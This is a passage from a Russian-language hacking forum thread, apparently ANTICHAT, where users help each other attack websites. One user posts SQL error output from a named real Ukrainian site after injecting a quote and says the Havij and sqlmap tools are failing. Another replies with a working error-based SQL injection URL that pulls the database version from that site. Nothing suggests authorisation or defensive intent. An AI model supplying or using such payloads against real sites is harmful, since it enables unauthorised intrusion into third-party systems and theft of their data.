Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

14.10.2015, 20:03

AlexG

Guest

Сообщений: n/a

Провел на форуме:
11344

Репутация: 5

Цитата:

Сообщение от dexspace

dexspace said:
↑
http://www.veles.km.ua/
'"
выдаёт

Код:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1
query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1;

сайт уязвим, но havij не может выдрать имя базы.
сейчас сканю sqlmap
есть идеи?

Руки рулят

Код:

Code:
http://www.veles.km.ua/' and (select 1 from (Select count(*),Concat((select version()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)  --+